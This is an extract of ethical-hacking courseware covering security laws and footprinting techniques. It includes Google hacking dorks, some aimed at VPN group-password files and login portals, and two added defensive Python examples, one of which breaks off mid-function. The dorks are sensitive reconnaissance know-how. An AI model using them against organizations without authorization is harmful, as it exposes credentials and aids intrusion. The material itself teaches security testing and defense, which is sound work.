The HIPAA Privacy Rule establishes national standards to protect people's medical records and other personal health information and applies to health plans, healthcare clearinghouses, and healthcare providers that conduct certain healthcare transactions electronically. The rule requires appropriate safeguards to protect the privacy of personal health information. It sets limits and conditions on the uses and disclosures that may be made of such information without patient authorization. The rule also gives patients rights over their health information, including the right to examine and obtain a copy of their health records and to request corrections.

Security Rule

The HIPAA Security Rule establishes national standards to protect individuals' electronic personal health information that is created, received, used, or maintained by a covered entity. The Security Rule requires appropriate administrative, physical, and technical safeguards to ensure the confidentiality, integrity, and security of electronically protected health information.

Employer Identifier Standard

HIPAA requires that each employer has a standard national number that identifies them on standard transactions.

National Provider Identifier (NPI) Standard

The National Provider Identifier (NPI) is a HIPAA Administrative Simplification Standard. The NPI is a unique identification number assigned to covered healthcare providers. Covered healthcare providers and all health plans and healthcare clearinghouses must use the NPIs in the administrative and financial transactions adopted under HIPAA. The NPI is a 10-position, intelligence-free numeric identifier (10-digit number). This means that the numbers do not carry other information about healthcare providers, such as the state in which they live or their medical specialty.

Enforcement Rule

The HIPAA Enforcement Rule contains provisions relating to compliance and investigation, as well as the imposition of civil monetary penalties for violations of the HIPAA Administrative Simplification Rules and procedures for hearings.
Sarbanes-Oxley Act (SOX)

Enacted in 2002, the Sarbanes-Oxley Act is designed to protect investors and the public by increasing the accuracy and [...]

[Table: the eleven titles of the Sarbanes-Oxley Act]
- Title I: Public Company Accounting Oversight Board
- Title II: Auditor Independence
- Title III: Corporate Responsibility
- Title IV: Enhanced Financial Disclosures
- Title V: Analyst Conflicts of Interest
- Title VI: Commission Resources and Authority
- Title VII: Studies and Reports
- Title VIII: Corporate and Criminal Fraud Accountability
- Title IX: White-Collar Crime Penalty Enhancement
- Title X: Corporate Tax Returns
- Title XI: Corporate Fraud Accountability
[...] behaviors of corporate officers and describes specific forfeitures of benefits and civil penalties for non-compliance.

Title IV: Enhanced Financial Disclosures: Title IV consists of nine sections. It describes enhanced reporting requirements for financial transactions, including off-balance-sheet transactions, pro-forma figures, and the stock transactions of corporate officers. It requires internal controls to ensure the accuracy of financial reports and disclosures and mandates both audits and reports on those controls. It also requires timely reporting of material changes in financial conditions and specific enhanced reviews of corporate reports by the SEC or its agents.

Title V: Analyst Conflicts of Interest: Title V consists of only one section that discusses the measures designed to help restore investor confidence in the reporting of securities analysts. It defines the code of conduct for securities analysts and requires that they disclose any knowable conflicts of interest.

Title VI: Commission Resources and Authority: Title VI consists of four sections and defines practices to restore investor confidence in securities analysts. It also defines the SEC's authority to censure or bar securities professionals from practice and defines the conditions to bar a person from practicing as a broker, advisor, or dealer.

Title VII: Studies and Reports: Title VII consists of five sections and requires the Comptroller General and the Securities and Exchange Commission (SEC) to perform various studies and to report their findings. The required studies and reports include the effects of the consolidation of public accounting firms, the role of credit rating agencies in the operation of securities markets, securities violations, enforcement actions, and whether investment banks assisted Enron, Global Crossing, and others to manipulate earnings and obfuscate true financial conditions.

Title VIII: Corporate and Criminal Fraud Accountability: Title VIII, also known as the "Corporate and Criminal Fraud Accountability Act of 2002," consists of seven sections. It describes specific criminal penalties for the manipulation, destruction, or alteration of financial records or interference with investigations, while also providing certain protections for whistle-blowers.

Title IX: White-Collar-Crime Penalty Enhancement: Title IX, also known as the "White Collar Crime Penalty Enhancement Act of 2002," consists of six sections. This title increases the criminal penalties associated with white-collar crimes and conspiracies. It recommends stronger sentencing guidelines and specifically adds failure to certify corporate financial reports as a criminal offense.

Title X: Corporate Tax Returns: Title X consists of one section that states that the Chief Executive Officer should sign the company tax return.

Title XI: Corporate Fraud Accountability: Title XI consists of seven sections. Section 1101 recommends the following name for the title: "Corporate Fraud Accountability Act of 2002." It identifies corporate fraud and records tampering as criminal offenses and joins those offenses to specific penalties. It also revises sentencing guidelines and strengthens penalties. Doing so enables the SEC to temporarily freeze "large" or "unusual" transactions or payments.
The Digital Millennium Copyright Act (DMCA)
Source: https://www.copyright.gov

The DMCA is an American copyright law that implements two 1996 treaties from the World Intellectual Property Organization (WIPO): the WIPO Copyright Treaty and the WIPO Performances and Phonograms Treaty. In order to implement US treaty obligations, the DMCA defines legal prohibitions against circumvention of the technological protection measures employed by copyright owners to protect their works, and against the removal or alteration of copyright management information. The DMCA contains five titles:

Title I: WIPO TREATY IMPLEMENTATION: Title I implements the WIPO treaties. First, it makes certain technical amendments to US law in order to provide the appropriate references and links to the treaties. Second, it creates two new prohibitions in Title 17 of the U.S. Code—one on circumvention of the technological measures used by copyright owners to protect their works and one on tampering with copyright management information—and adds civil remedies and criminal penalties for violating the prohibitions.
Title II: ONLINE COPYRIGHT INFRINGEMENT LIABILITY LIMITATION: Title II of the DMCA adds a new section 512 to the Copyright Act to create four new limitations on liability for copyright infringement by online service providers. A service provider bases these limitations on the following four categories of conduct:

- Transitory communications
- System caching
- The user-directed storage of information on systems or networks
- Information location tools

New section 512 also includes special rules concerning the application of these limitations to nonprofit educational institutions.

Title III: COMPUTER MAINTENANCE OR REPAIR: Title III of the DMCA allows the owner of a copy of a program to make reproductions or adaptations when necessary to use the program in conjunction with a computer. The amendment permits the owner or lessee of a computer to make or to authorize the making of a copy of a computer program in the course of maintaining or repairing that computer.

[...] the hulls (including decks) of vessels no longer than 200 feet.

Federal Information Security Management Act (FISMA)
Source: https://csrc.nist.gov

The Federal Information Security Management Act of 2002 was enacted to produce several key security standards and guidelines required by Congressional legislation. FISMA provides a comprehensive framework for ensuring the effectiveness of information security controls over information resources that support federal operations and assets. It requires each federal agency to develop, document, and implement an agency-wide program to provide information security for the information and information systems that support the operations and assets of the agency, including those provided or managed by another agency, contractor, or another source. The FISMA framework includes:

- Standards for categorizing information and information systems by mission impact
- Standards for the minimum security requirements for information and information systems
- Guidance for selecting appropriate security controls for information systems
- Guidance for assessing security controls in information systems and determining their effectiveness
- Guidance for the security authorization of information systems
General Data Protection Regulation (GDPR)

Source: https://gdpr.eu
The General Data Protection Regulation (GDPR) is one of the most stringent privacy and security laws globally. Though it was drafted and passed by the European Union (EU), it imposes obligations onto organizations anywhere, so long as they target or collect data related to people in the EU. The regulation was put into effect on May 25, 2018. The GDPR will levy harsh fines against those who violate its privacy and security standards, with penalties reaching tens of millions of euros.

With the GDPR, Europe signifies its firm stance on data privacy and security when more people are entrusting their data with cloud services, and breaches are a daily occurrence. The regulation itself is extensive, far-reaching, and relatively light on specifics, making GDPR compliance a daunting prospect, particularly for small and medium-sized enterprises (SMEs).
GDPR Data Protection Principles

The GDPR includes seven protection and accountability principles outlined in Article 5.1-2:

- Lawfulness, fairness, and transparency: Processing must be lawful, fair, and transparent to the data subject.
- Storage limitation: You may only store personally identifying data for as long as necessary for the specified purpose.
- Integrity and confidentiality: Processing must be done in such a way as to ensure appropriate security, integrity, and confidentiality (e.g., by using encryption).
- Accountability: The data controller is responsible for demonstrating GDPR compliance with all of these principles.
Data Protection Act 2018 (DPA)

The DPA 2018 is a law in the UK that protects individuals' personal data. It updates and replaces the Data Protection Act 1998 and came into effect on May 25, 2018. Its provisions include:

- Requiring personal data to be processed on the basis of the data subject's specific consent or another specified basis
- Conferring rights on the data subject in connection with the processing of personal data
- Making provision for the regulation of the processing of information relating to individuals
- Conferring functions on the Information Commissioner, giving the holder of that office responsibility for monitoring these provisions
- Making provision in connection with the Information Commissioner's functions under specified regulations relating to information
- Making provision for a direct marketing code of practice, and for connected purposes
[Table: cyber laws in different countries. Only the country names (United States, Japan, Singapore, South Africa, South Korea, Belgium, Hong Kong) and a few law names, such as the Privacy Act of 1974 and the Trademark Law, survive the extraction; the rest of the table contents are not recoverable.]
Cyber Law in Different Countries

Cyber law or Internet law refers to any laws that deal with protecting the Internet and other online communication technologies. Cyber law covers topics such as Internet access and usage, privacy, freedom of expression, and jurisdiction. Cyber laws provide an assurance of the integrity, security, privacy, and confidentiality of information in both governmental and private organizations. These laws have become prominent due to the increase in Internet usage around the world. Cyber laws vary by jurisdiction and country, so implementing them is quite challenging. Violating these laws results in punishments ranging from fines to imprisonment.
Module Summary

This module has discussed elements of information security, information security attacks, and information warfare. It has covered cyber kill chain methodology, TTPs, and IoCs in detail. It also discussed hacking concepts, types, and phases. This module closely examined ethical hacking concepts such as its scope and limitations and the skills of an ethical hacker. It also covered the topic of information security controls such as defense-in-depth, risk management, cyber threat intelligence, threat modeling, incident management process, and AI and ML. Finally, this module ended with a detailed discussion of various information security acts and laws.

The next module will examine how attackers, as well as ethical hackers and pen testers, perform footprinting to collect information about their target before an attack or audit.
Certified Ethical Hacker

Module 02: Footprinting and Reconnaissance
Module Objectives

Footprinting is the first step in the evaluation of the security posture of the IT infrastructure of a target organization. Through footprinting and reconnaissance, one can gather maximum information about a computer system or a network and about any device connected to that network. In other words, footprinting provides a security profile blueprint for an organization and should be undertaken in a methodological manner.

This module starts with an introduction to footprinting concepts and provides insights into the footprinting methodology. The module ends with an overview of footprinting tools and countermeasures.

At the end of this module, you will be able to:

- Describe footprinting concepts
- Perform footprinting through search engines and using advanced Google hacking techniques
- Perform footprinting through web services and social networking sites
- Perform website footprinting and email footprinting
- Perform Whois, DNS, and network footprinting
- Perform footprinting through social engineering
- Use different footprinting tools
- Apply footprinting best practices
Module Flow

Footprinting Concepts

Ethical hacking is legal in nature and is conducted to evaluate the security of an organization's IT infrastructure with their consent. Footprinting, where an attacker tries to gather information about a target, is the first step in ethical hacking. This step acts as a preparatory phase for the attacker, who needs to gather as much information as possible to find ways to intrude easily into the target network.

This section aims to familiarize you with footprinting, why it is necessary, and its objectives.
What is Footprinting?

Footprinting, the first step in ethical hacking, refers to the process of collecting information about a target network and its environment. Using footprinting, you can find a number of opportunities to penetrate and assess the target organization's network. An essential aspect of footprinting is identifying the level of risk associated with the organization's publicly accessible information.

After you complete the footprinting process in a methodological manner, you will obtain the blueprint of the security profile of the target organization. Here, the term "blueprint" refers to the unique system profile of the target organization acquired by footprinting.

There is no single methodology for footprinting, as information can be traced in a number of [...] exploiting these vulnerabilities.

Types of Footprinting

Footprinting can be categorized into passive footprinting and active footprinting.
Passive Footprinting

Passive footprinting involves gathering information about the target without direct interaction. It is mainly useful when the information gathering activities are not to be detected by the target. Performing passive footprinting is technically difficult, as active traffic is not sent to the target organization from a host or anonymous hosts or services over the Internet. We can only collect archived and stored information about the target using search engines, social networking sites, and so on.

Passive footprinting techniques include:

- Finding information through search engines
- Finding the Top-level Domains (TLDs) and sub-domains of a target through web services
- Collecting location information on the target through web services
- Performing people search using social networking sites and people search services
- Gathering financial information about the target through financial services
- Gathering infrastructure details of the target organization through job sites
- Collecting information through deep and dark web footprinting
- Determining the operating systems in use by the target organization
- Performing competitive intelligence
- Monitoring the target using alert services
- Gathering information using groups, forums, blogs, and NNTP Usenet newsgroups
- Collecting information through social engineering on social networking sites
- Extracting information about the target using Internet archives
- Gathering information using business profile sites
- Monitoring website traffic of the target
- Tracking the online reputation of the target
Active Footprinting

Active footprinting involves gathering information about the target with direct interaction. In active footprinting, the target may recognize the ongoing information gathering process, as we overtly interact with the target network. Active footprinting requires more preparation than passive footprinting, as it may leave traces that may alert the target organization.

Active footprinting techniques include:

- Querying published name servers of the target
- Searching for digital files
- Extracting website links and gathering wordlists from the target website
- Extracting metadata of published documents and files
- Gathering website information using web spidering and mirroring tools
- Gathering information through email tracking
- Harvesting email lists
- Performing Whois lookup
- Extracting DNS information
- Performing traceroute analysis
- Performing social engineering
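The passage above notes that active footprinting "may leave traces that may alert the target organization". The following added example (it is not part of the courseware and not EC-Council code) shows what three of those traces look like to the defender and how to flag them from logs: a site-mirroring tool identified by its User-Agent string, one source requesting many distinct URLs within a short window (web spidering), and one source receiving a burst of NXDOMAIN answers for names under the organization's own domain (enumeration against the published name servers). The log lines are constructed samples in Apache combined format and a simplified resolver query-log format; the domain example.com, the thresholds, and the HTTrack and wget User-Agent signatures are assumptions chosen for the demonstration.

```python
"""Added example: flag traces of active footprinting in constructed web and DNS logs."""
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample logs (RFC 5737 documentation addresses), not real traffic.
ACCESS_LOG = """\
203.0.113.7 - - [10/Mar/2021:09:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "HTTrack 3.0x"
203.0.113.7 - - [10/Mar/2021:09:00:02 +0000] "GET /about HTTP/1.1" 200 3100 "-" "HTTrack 3.0x"
203.0.113.7 - - [10/Mar/2021:09:00:02 +0000] "GET /careers HTTP/1.1" 200 2900 "-" "HTTrack 3.0x"
203.0.113.7 - - [10/Mar/2021:09:00:03 +0000] "GET /contact HTTP/1.1" 200 1800 "-" "HTTrack 3.0x"
203.0.113.7 - - [10/Mar/2021:09:00:03 +0000] "GET /docs/report.pdf HTTP/1.1" 200 90000 "-" "HTTrack 3.0x"
203.0.113.7 - - [10/Mar/2021:09:00:04 +0000] "GET /docs/plan.docx HTTP/1.1" 200 40000 "-" "HTTrack 3.0x"
198.51.100.9 - - [10/Mar/2021:09:10:00 +0000] "GET /login HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2021:09:12:30 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""
DNS_LOG = """\
2021-03-10T09:05:00Z client 203.0.113.7 query dev.example.com A NXDOMAIN
2021-03-10T09:05:00Z client 203.0.113.7 query staging.example.com A NXDOMAIN
2021-03-10T09:05:01Z client 203.0.113.7 query vpn.example.com A NOERROR
2021-03-10T09:05:01Z client 203.0.113.7 query mail2.example.com A NXDOMAIN
2021-03-10T09:05:01Z client 203.0.113.7 query test.example.com A NXDOMAIN
2021-03-10T09:05:02Z client 203.0.113.7 query intranet.example.com A NXDOMAIN
2021-03-10T09:30:00Z client 198.51.100.9 query www.example.com A NOERROR
"""

# Apache/nginx "combined" access-log format and a simplified resolver query log (assumed formats).
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)'
                       r' [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
DNS_RE = re.compile(r'^(?P<ts>\S+) client (?P<ip>\S+) query (?P<name>\S+) (?P<qtype>\S+) (?P<rcode>\S+)$')
# User-Agent strings of common site-mirroring tools: a weak signal on its own, since the client chooses it.
MIRROR_TOOL_UA = re.compile(r"httrack|wget", re.IGNORECASE)


def parse_access_log(text):
    """Return one dict per well-formed access-log line; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            events.append({"ip": m["ip"], "path": m["path"], "ua": m["ua"],
                           "status": int(m["status"]),
                           "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")})
    return events


def parse_dns_log(text):
    """Return one dict per query-log line, with an aware UTC timestamp."""
    events = []
    for line in text.splitlines():
        m = DNS_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
            events.append({"ip": m["ip"], "name": m["name"].lower(), "rcode": m["rcode"], "ts": ts})
    return events


def _burst(items, window_s, threshold):
    """Size of the first window_s-second window holding >= threshold distinct keys, else 0.
    items: iterable of (timestamp, key) pairs."""
    items = sorted(items)
    for i, (start, _) in enumerate(items):
        keys = {k for t, k in items[i:] if (t - start).total_seconds() <= window_s}
        if len(keys) >= threshold:
            return len(keys)
    return 0


def detect_web_footprinting(events, window_s=60, min_distinct_paths=5):
    """Flag sources that identify as a mirroring tool or fetch many distinct URLs in a short window."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)
    findings = []
    for ip, evs in by_ip.items():
        tool_uas = sorted({ev["ua"] for ev in evs if MIRROR_TOOL_UA.search(ev["ua"])})
        if tool_uas:
            findings.append((ip, "mirroring-tool", f"user-agent {tool_uas[0]!r}"))
        n = _burst([(ev["ts"], ev["path"]) for ev in evs], window_s, min_distinct_paths)
        if n:
            findings.append((ip, "spidering", f"{n} distinct paths within {window_s}s"))
    return findings


def detect_dns_enumeration(events, org_domain, window_s=60, min_names=5):
    """Flag sources that get NXDOMAIN for many distinct names under org_domain in a short window."""
    suffix = "." + org_domain.lower()
    by_ip = defaultdict(list)
    for ev in events:
        if ev["rcode"] == "NXDOMAIN" and ev["name"].endswith(suffix):
            by_ip[ev["ip"]].append((ev["ts"], ev["name"]))
    findings = []
    for ip, items in by_ip.items():
        n = _burst(items, window_s, min_names)
        if n:
            findings.append((ip, "dns-enumeration", f"{n} NXDOMAIN names under {org_domain} within {window_s}s"))
    return findings


def run_all():
    """Run both detectors over the constructed samples; returns (ip, kind, detail) tuples."""
    return (detect_web_footprinting(parse_access_log(ACCESS_LOG))
            + detect_dns_enumeration(parse_dns_log(DNS_LOG), "example.com"))


if __name__ == "__main__":
    for ip, kind, detail in run_all():
        print(f"{ip:15} {kind:16} {detail}")
```

Run as a script, it prints one line per finding (three for the samples, all for 203.0.113.7; the ordinary login traffic from 198.51.100.9 is not flagged). In practice the thresholds must be tuned to the site's normal crawler load, since legitimate search-engine bots also request many distinct paths, and the User-Agent match is kept beside the rate-based checks precisely because the string is whatever the client chooses to send.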
Information Obtained in Footprinting

The major objectives of footprinting include collecting the network information, system information, and organizational information of the target. By conducting footprinting across different network levels, you can gain information such as network blocks, specific IP addresses, employee details, and so on. Such information can help attackers in gaining access to sensitive data or performing various attacks on the target network.

- Organization Information: Such information about an organization is available from its website. In addition, you can query the target's domain name against the Whois database and obtain valuable information. The information collected includes:
  - Employee details (employee names, contact addresses, designations, and work experience)
  - Addresses and mobile/telephone numbers
  - Branch and location details
  - Partners of the organization
  - Web links to other company-related sites
  - Background of the organization
  - Web technologies
  - News articles, press releases, and related documents
  - Legal documents related to the organization
  - Patents and trademarks related to the organization

  Attackers can access organizational information and use such information to identify key personnel and launch social engineering attacks to extract sensitive data about the entity.

- Network Information: You can gather network information by performing Whois database analysis, trace routing, and so on. The information collected includes:
  - Domain and sub-domains
  - Network blocks
  - Network topology, trusted routers, and firewalls
  - IP addresses of the reachable systems
  - Whois records
  - DNS records and related information

- System Information: You can gather system information by performing network footprinting, DNS footprinting, website footprinting, email footprinting, and so on. The information collected includes:
  - Web server OS
  - Location of web servers
  - Publicly available email addresses
  - Usernames, passwords, and so on
Objectives of Footprinting

To build a hacking strategy, attackers need to gather information about the target organization's network. They then use such information to locate the easiest way to break through the organization's security perimeter. As mentioned previously, the footprinting methodology makes it easy to gather information about the target organization; this plays a vital role in the hacking process. Footprinting helps to:

- Know Security Posture: Performing footprinting on the target organization gives the complete profile of the organization's security posture. Hackers can then analyze the report to identify loopholes in the security posture of the target organization and build a hacking plan accordingly.
- Reduce Focus Area: By using a combination of tools and techniques, attackers can take an unknown entity (for example, XYZ Organization) and reduce it to a specific range of domain names, network blocks, and individual IP addresses of systems directly connected to the Internet, as well as many other details pertaining to its security posture.
- Identify Vulnerabilities: A detailed footprint provides maximum information about the target organization. It allows the attacker to identify vulnerabilities in the target systems to select appropriate exploits. Attackers can build their own information database about the security weaknesses of the target organization. Such a database can then help in identifying the weakest link in the organization's security perimeter.
- Draw Network Map: Combining footprinting techniques with tools such as Tracert allows the attacker to create diagrammatic representations of the target organization's network presence. Specifically, network [...]
Footprinting Threats

Attackers perform footprinting as the first step of any attack on information systems. In this phase, attackers attempt to collect valuable system-level information such as account details, operating system and other software versions, server names, database schema details, and so on, which will be useful in the hacking process. The following are assorted threats made possible through footprinting:

- Social Engineering: Without using any intrusion methods, hackers directly and indirectly collect information through persuasion and other means. Hackers gather crucial information from willing employees who are unaware of the hackers' intent.
- System and Network Attacks: Footprinting enables an attacker to perform system and network attacks. Thus, attackers can gather information related to the target organization's system configuration, the operating system running on the machine, and so on. Using this information, attackers can find vulnerabilities in the target system and then exploit such vulnerabilities. They can then take control of a target system or the entire network.
- Information Leakage: Information leakage poses a threat to any organization. If sensitive information of an entity falls into the hands of attackers, they can mount an attack based on the information or alternatively use it for monetary benefit.
- Privacy Loss: Through footprinting, hackers can access the systems and networks of the organization and even escalate the privileges up to admin levels, resulting in the loss of privacy for the organization as a whole and for its individual personnel.
- Corporate Espionage: Corporate espionage is a central threat to organizations, as competitors often aim to attempt to secure sensitive data through footprinting. Through this approach, competitors can launch similar products in the market, alter prices, and generally undermine the market position of a target organization.
- Business Loss: Footprinting can have a major effect on organizations such as online businesses and other e-commerce websites as well as banking and finance-related businesses. Billions of dollars are lost every year due to malicious attacks by hackers.
Module Flow

Footprinting Methodology

Now that you are familiar with footprinting concepts and potential threats, we will discuss the footprinting methodology. The footprinting methodology is a procedure for collecting information about a target organization from all available sources. It involves gathering information about a target organization, such as URLs, locations, establishment details, number of employees, specific range of domain names, contact information, and other related information. Attackers collect this information from publicly accessible sources such as search engines, social networking sites, Whois databases, and so on. This section discusses the common techniques used to collect information about the target organization from different sources.

Footprinting techniques:

- Footprinting through search engines
- Footprinting through web services
- Email footprinting
- Whois footprinting
- DNS footprinting
- Network footprinting
- Footprinting through social engineering
Footprinting through Search Engines
Search engines are the main sources of key information about a target organization. They play a major role in extracting critical details about a target from the Internet. Search engines use automated software, i.e., crawlers, to continuously scan active websites and add the retrieved results to the search engine index, which is stored in a massive database. When a user queries the search engine index, it returns a list of Search Engine Results Pages (SERPs). These results include web pages, videos, images, and many different file types ranked and displayed according to their relevance. Many search engines can extract target organization information such as technology platforms, employee details, login pages, intranet portals, contact information, and so on. The information helps the attacker in performing social engineering and other types of advanced system attacks.
A Google search could reveal submissions to forums by security personnel, disclosing the brands of firewalls or antivirus software used by the target. This information helps the attacker in identifying vulnerabilities in such security controls.
For example, consider an organization, perhaps Microsoft. Type Microsoft in the Search box of a search engine and press Enter; this will display the results containing information about Microsoft. Browsing the results often provides critical information such as physical location, contact addresses, services offered, number of employees, and so on, which may prove to be a valuable source for hacking.
Examples of major search engines include Google, Bing, Yahoo, Ask, Aol, Baidu, WolframAlpha, and DuckDuckGo.
Attackers can use advanced search operators available with these search engines and create complex queries to find, filter, and sort specific information regarding the target. Search engines are also used to find other sources of publicly accessible information. For example, you can type "top job portals" to find major job portals that provide critical information about the target organization.
Footprinting Using Advanced Google Hacking Techniques
Google hacking refers to the use of advanced Google search operators for creating complex search queries to extract sensitive or hidden information. The accessed information is then used by attackers to find vulnerable targets. Footprinting using advanced Google hacking techniques involves locating specific strings of text within search results using advanced operators in the Google search engine.
Advanced Google hacking refers to the art of creating complex search engine queries. Queries can retrieve valuable data about a target company from Google search results. Through Google hacking, an attacker tries to find websites that are vulnerable to exploitation. Attackers can use the Google Hacking Database (GHDB), a database of queries, to identify sensitive data. Google operators help in finding the required text and avoiding irrelevant data. Using advanced Google operators, attackers can locate specific strings of text such as specific versions of vulnerable web applications. When a query without advanced search operators is specified, Google traces the search terms in any part of the webpage, including the title, text, URL, digital files, and so on. To confine a search, Google offers advanced search operators. These search operators help to narrow down the search query and obtain the most relevant and accurate output.
The syntax to use an advanced search operator is as follows: operator:search_term
Note: Do not enter any spaces between the operator and the query.
Some popular Google advanced search operators include:
Source: http://www.googleguide.com
+ site: This operator restricts search results to the specified site or domain. For example, the [games site:www.certifiedhacker.com] query gives information on games from the certifiedhacker site.
+ intitle: This operator restricts results to only the pages containing the specified term in the title. For example, the [malware detection intitle:help] query returns only pages that have the term "help" in the title, and the terms "malware" and "detection" anywhere within the page.
+ inanchor: This operator restricts results to only the pages containing the query terms specified in the anchor text on links to the page. For example, the [Anti-virus inanchor:Norton] query returns only pages with the word "Norton" in the anchor text on links to the pages and the page containing the word "Anti-virus."
+ allinanchor: This operator restricts results to only the pages containing all query terms specified in the anchor text on links to the pages. For example, the [allinanchor: best cloud service provider] query returns only pages for which the anchor text on links to the pages contains the words "best," "cloud," "service," and "provider."
+ cache: This operator displays Google's cached version of a web page instead of the current version of the web page. For example, [cache:www.eff.org] will show Google's cached version of the Electronic Frontier Foundation home page.
+ link: This operator searches websites or pages that contain links to the specified website or page. For example, [link:www.googleguide.com] finds pages that point to Google Guide's home page. Note: According to Google's documentation, "you cannot combine a link: search with a regular keyword search." Also note that when you combine link: with another advanced Google operator, Google may not return all the pages that match.
+ related: This operator displays websites that are similar or related to the URL specified. For example, [related:www.microsoft.com] provides the Google search engine results page with websites similar to microsoft.com.
+ info: This operator finds information for the specified web page. For example, [info:gothotel.com] provides information about the national hotel directory GotHotel.com home page.
+ location: This operator finds information for a specific location. For example, [location: 4 seasons restaurant] will give you results based on the term "4 seasons restaurant."
+ filetype: This operator allows you to search for results based on a file extension. For example, [jasmine filetype:jpg] will provide jpg files based on jasmine.
What can a Hacker do with Google Hacking?
An attacker can create complex search engine queries to filter large amounts of search results to obtain information related to computer security. The attacker uses Google operators that help locate specific strings of text within the search results. Thus, the attacker can not only detect websites and web servers that are vulnerable to exploitation but also locate private, sensitive information about others, such as credit card numbers, social security numbers, passwords, and so on. Once a vulnerable site is identified, attackers try to launch various possible attacks, such as buffer overflow and SQL injection, which compromise information security.
Examples of sensitive information on public servers that an attacker can extract with the help of Google Hacking Database (GHDB) queries include:
+ Error messages that contain sensitive information
+ Files containing passwords
+ Sensitive directories
+ Pages containing logon portals
+ Pages containing network or vulnerability data, such as IDS, firewall logs, and configurations
Example: Use the Google Advance Operator syntax [intitle:intranet inurl:intranet +intext:"human resources"] to find sensitive information about a target organization and its employees. Attackers use the gathered information to perform social engineering attacks. The screenshot below shows a Google search engine results page displaying the results for the query mentioned above.
Figure 2.1: Search engine results for given Google Advance Operator syntax
Google Hacking Database
Source: https://www.exploit-db.com
The Google Hacking Database (GHDB) is an authoritative source for querying the ever-widening scope of the Google search engine. In the GHDB, you will find search terms for files containing usernames, vulnerable servers, and even files containing passwords. The Exploit Database is a Common Vulnerabilities and Exposures (CVE) compliant archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers.
Using GHDB dorks, attackers can rapidly identify all the publicly available exploits and vulnerabilities of the target organization's IT infrastructure. Attackers use Google dorks in Google advanced search operators to extract sensitive information about the target, such as vulnerable servers, error messages, sensitive files, login pages, and websites.
Google Hacking Database Categories:
+ Footholds
+ Files Containing Usernames
+ Sensitive Directories
+ Web Server Detection
+ Vulnerable Files
+ Vulnerable Servers
+ Error Messages
+ Files Containing Juicy Info
+ Files Containing Passwords
+ Sensitive Online Shopping Info
+ Network or Vulnerability Data
+ Pages Containing Login Portals
+ Various Online Devices
+ Advisories and Vulnerabilities
The following tables summarize some of the Google hacking or Google dork operators used to obtain specific information related to VoIP and VPN footprinting, respectively.
Google search queries for VoIP footprinting
Google Dork | Description
intitle:"Login Page" intext:"Phone Adapter Configuration Utility" | Pages containing login portals
inurl:/voice/advanced/ intitle:Linksys SPA configuration | Finds the Linksys VoIP router configuration page
intitle:"D-Link VoIP Router" "Welcome" | Pages containing D-Link login portals
intitle:asterisk.management portal web- | Looks for the Asterisk management portal
intitle:"SPA504G Configuration" | Finds Configuration Utility for Cisco SPA504G IP phones
intitle:"Sipura.SPA.Configuration" -.pdf | Finds configuration pages for online VoIP devices
intitle:asterisk web management portal | Finds the Asterisk web management portal
intitle:"login" inurl:8080 intext:"UserLogin" "English" | VoIP login portals
Table 2.1: Google search queries for VoIP footprinting
Google search queries for VPN footprinting
Google Dork | Description
filetype:pcf "cisco" "GroupPwd" | Cisco VPN files with Group Passwords for remote access
"[main]" "enc_GroupPwd=" ext:txt | Finds Cisco VPN client passwords (encrypted but easily cracked)
"Config" intitle:"Index of" intext:vpn | Directory with keys of VPN servers
filetype:pcf vpn OR Group | Finds publicly accessible .pcf files used by VPN clients
vpnssl | Retrieves login portals containing companies' vpnssl access
intitle:"SSL VPN Service" + intext:"Your system administrator provided the following information to help understand and remedy the security conditions:" | Finds Cisco ASA login web pages
Table 2.2: Google search queries for VPN footprinting
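The operator semantics above and the VoIP/VPN dork tables lend themselves to a defensive check: evaluate the same queries locally against an inventory of an organization's own pages, so an exposed intranet or configuration page is found by its owner first. The Python below is an added example (not EC-Council or Google code) that implements the site:, intitle:, inurl:, intext:, filetype:/ext:, quoted-phrase, -negation and OR semantics as the text describes them, generalizing beyond the single intranet query; the example.com page inventory is constructed.

```python
"""Evaluate Google-style advanced operator queries against an inventory of an
organization's OWN pages (self-audit). Added example, not EC-Council or Google
code; the inventory below is constructed."""
import re
import shlex
from dataclasses import dataclass
from typing import Dict, List, Optional

OPERATORS = {"site", "intitle", "inurl", "intext", "filetype", "ext"}


@dataclass
class Page:
    url: str
    title: str
    text: str

    @property
    def host(self) -> str:
        return re.sub(r"^https?://", "", self.url).split("/")[0].lower()

    @property
    def filetype(self) -> str:
        # Extension of the last path segment; "" when the URL has none
        path = re.sub(r"^https?://[^/]*", "", self.url.split("?")[0])
        name = path.rsplit("/", 1)[-1]
        return name.rsplit(".", 1)[1].lower() if "." in name else ""


@dataclass
class Term:
    operator: Optional[str]  # None means a bare search term
    value: str
    negated: bool = False


def parse_query(query: str) -> List[List[Term]]:
    """Split a query into OR-groups; the groups themselves are ANDed.
    operator:search_term carries no space, so 'inurl:' alone is a bare term."""
    groups: List[List[Term]] = []
    join_next = False
    for tok in shlex.split(query):  # keeps "human resources" as one token
        if tok == "OR":
            join_next = True
            continue
        tok = tok.lstrip("+")  # Google's '+' prefix is a no-op here
        negated = tok.startswith("-") and len(tok) > 1
        if negated:
            tok = tok[1:]
        op, sep, val = tok.partition(":")
        if sep and op.lower() in OPERATORS and val:
            term = Term(op.lower(), val, negated)
        else:
            term = Term(None, tok, negated)
        if join_next and groups:
            groups[-1].append(term)
        else:
            groups.append([term])
        join_next = False
    return groups


def term_matches(term: Term, page: Page) -> bool:
    v = term.value.lower()
    if term.operator == "site":
        hit = page.host == v or page.host.endswith("." + v)
    elif term.operator == "intitle":
        hit = v in page.title.lower()
    elif term.operator == "inurl":
        hit = v in page.url.lower()
    elif term.operator == "intext":
        hit = v in page.text.lower()
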